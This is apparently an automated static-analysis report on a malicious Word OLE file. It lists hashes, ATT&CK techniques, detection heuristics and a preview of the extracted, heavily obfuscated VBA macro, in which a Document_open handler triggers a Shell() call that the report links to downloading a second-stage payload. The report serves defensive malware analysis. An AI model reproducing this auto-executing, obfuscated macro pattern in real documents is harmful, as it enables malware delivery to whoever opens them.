Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b29091e1dfdda47c…

MALICIOUS

Office (OLE)

101.0 KB Created: 2018-06-15 19:27:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 712fbc52ac8b1a9e887fef6c2519ec14 SHA-1: 33fff0a2184ed6757b42cb6f5b9dd6d1c4cc0611 SHA-256: b29091e1dfdda47cc3d21f565816a16ead7e099c38566b1972d896963a9fc1cc
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The 'Document_Open' macro triggers a 'Shell()' call, which is a critical finding indicating the execution of arbitrary commands. This macro is designed to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Malware.Valyria-6874636-0'. The VBA code is heavily obfuscated, but the intent to execute an external command is clear.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6874636-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 103,424 bytes but its declared streams total only 57,355 bytes — 46,069 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2115 bytes
SHA-256: 2437dade82b90d9b3ad727575d7dee1cc4bf8ce10624f7e70ee48689b8c8b122
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub